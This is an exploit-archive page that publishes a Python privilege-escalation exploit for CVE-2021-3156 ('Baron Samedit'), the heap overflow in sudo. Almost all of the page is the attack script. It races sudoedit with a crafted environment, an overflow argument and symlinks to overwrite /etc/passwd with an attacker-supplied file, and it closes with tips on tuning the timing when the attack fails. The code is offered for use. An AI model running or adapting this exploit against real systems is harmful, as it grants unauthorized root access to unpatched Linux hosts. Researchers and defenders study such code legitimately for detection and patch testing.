Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation

Sudo version 1.9.5p1 Baron Samedit heap-based buffer overflow and privilege escalation exploit.


MD5 | 06abe878c8e1c4839b5ad21bf99c0808

# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
# Date: 2021-02-02
# Exploit Author: West Shepherd
# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.
# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31
# CVE : CVE-2021-3156
# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.
# Sources:
# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
# (2) https://github.com/stong/CVE-2021-3156
# Requirements: Python3

#!/usr/bin/python3
import os
import pwd
import time
import sys
import argparse


class Exploit(object):
username = ''
size = 0
data = ''

def __init__(self, source, target, sleep):
self.sleep = sleep
self.source = source
self.target = target

@staticmethod
def readFile(path):
return open(path, 'r').read()

@staticmethod
def getUser():
return pwd.getpwuid(os.getuid())[0]

@staticmethod
def getSize(path):
return os.stat(path).st_size

def main(self):
self.username = self.getUser()
self.data = self.readFile(self.source)
self.size = self.getSize(self.target)
environ = {
'\n\n\n\n\n': '\n' + self.data,
'SUDO_ASKPASS': '/bin/false',
'LANG':
'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
'A': 'A' * 0xffff
}
for i in range(5000):
directory =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i
overflow =
'11111111111111111111111111111111111111111111111111111111%s' %
directory

if os.path.exists(directory):
sys.stdout.write('file exists %s\n' % directory)
continue

child = os.fork()
os.environ = environ
if child:
sys.stdout.write('[+] parent %d \n' % i)
sys.stdout.flush()
time.sleep(self.sleep)
if not os.path.exists(directory):
try:
os.mkdir(directory, 0o700)
os.symlink(self.target, '%s/%s' % (directory,
self.username))
os.waitpid(child, 0)
except:
continue
else:
sys.stdout.write('[+] child %d \n' % i)
sys.stdout.flush()
os.setpriority(os.PRIO_PROCESS, 0, 20)
os.execve(
path='/usr/bin/sudoedit',
argv=[
'/usr/bin/sudoedit',
'-A',
'-s',
'\\',
overflow
],
env=environ
)
sys.stdout.write('[!] execve failed\n')
sys.stdout.flush()
os.abort()
break

if self.size != self.getSize(self.target):
sys.stdout.write('[*] success at iteration %d \n' % i)
sys.stdout.flush()
break
sys.stdout.write("""
\nConsider the following if the exploit fails:
\n\t(1) If all directories are owned by root then sleep
needs to be decreased.
\n\t(2) If they're all owned by you, then sleep needs
increased.
""")


if __name__ == '__main__':
parser = argparse.ArgumentParser(
add_help=True,
description='* Sudo Privilege Escalation / Heap Overflow -
CVE-2021-3156 *'
)
try:
parser.add_argument('-source', action='store', help='Path to
malicious "passwd" file to overwrite the target')
parser.add_argument('-target', action='store', help='Target
file path to be overwritten (default: /etc/passwd)')
parser.add_argument('-sleep', action='store', help='Sleep
setting for forked processes (default: 0.01 seconds')
parser.set_defaults(target='/etc/passwd', sleep='0.01')

options = parser.parse_args()
if options.source is None:
parser.print_help()
sys.exit(1)

exp = Exploit(
source=options.source,
target=options.target,
sleep=float(options.sleep)
)
exp.main()
except Exception as err:
sys.stderr.write(str(err))


Related Posts